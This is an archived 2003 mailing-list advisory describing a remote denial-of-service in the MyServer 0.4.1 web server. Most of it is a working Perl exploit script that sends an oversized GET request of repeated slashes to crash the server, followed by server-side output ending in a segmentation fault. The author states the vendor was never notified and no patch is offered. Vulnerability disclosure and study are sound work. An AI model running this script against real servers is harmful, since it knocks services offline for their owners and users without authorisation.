hi.. Topic: MyServer 0.4.1 DOS Product: Myserver 0.4.1 (http://myserverweb.sourceforge.net) Note: yep, I'm on the dole, anyone wanna give me a job :) Vendor Notification: Woooops, sorry i forgot ;) Background: (from homepage) MyServer is a free and easy to configure web server. MyServer is licensed under the GNU General Public License (GPL). See the license page for additional info. Myserver runs under both Windows and Linux.. Although there is allready several found flaws in Myserver, I thought that the closet bug to this was: http://www.securityfocus.org/bid/7770/info/ but that was using excessive amounts of data.. We only need to use 20 "//" to cause a Dos condition.. Problem Description: When Myserver is running a simple GET request can cause a Remote Denial of service, stopping the HTTP server alltogether.. Also an extra note, this DOS doesn't get entered into the log file ;) Impact: Denial of service..possible code execution, haven't tested it fully yet..still finding holes ;) Patch: Nope i don't do patches.... ;) Exploit: ----------------myserver.pl------------------------ #!/usr/bin/perl #Myserver 0.4.1 Remote Denial of service ;) #oh joy... #deadbeat, uk2sec #eipat_private-ip.com #deadbeatat_private use IO::Socket; $dos = "//"x100; $request = "GET $dos"."HTTP/1.0\r\n\r\n"; $target = $ARGV[0]; print "\n\nMyserver 0.4.1 Remote Denial Of Service..\n"; print "deadbeat, uk2sec..\n"; print "usage: perl $0 <target>\n"; $sox = IO::Socket::INET->new( Proto=>"tcp", PeerPort=>"80", PeerAddr=>"$target" )or die "\nCan't connect to $target..\n"; print $sox $request; sleep 2; close $sox; print "Done...\n"; ------------------EOF-------------------------- Looks like this from the server side: ------------------------- ************************************** ************myServer 0.4.1************ ************************************** Initializing server configuration... Using english language Server configuration terminated Security access is not used, the web folder contents is accessible to anyone Initializing socket library... Socket library was initialized Computer name is: uk2sec-labs.no-ip.com IP Address #0: 192.168.0.1 Loading MIME types... MIME types loaded successfully: 139 Number of processors: 1 Creating thread 0... Thread created Creating listening thread... Creating server socket... Server socket created Trying to binding port... Port is binded Trying to listen on port... Listen on port: 80 Listening thread is created myServer is now ready to accept connections Press Ctrl+C to break execution Segmentation fault -------------------------- Tested on: Linux (redhat 9.0) regards, deadbeat, uk2sec.. eipat_private-ip.com "I'm not white, black or grey, i'm just very green..."
This archive was generated by hypermail 2b30 : Mon Jun 23 2003 - 08:18:14 PDT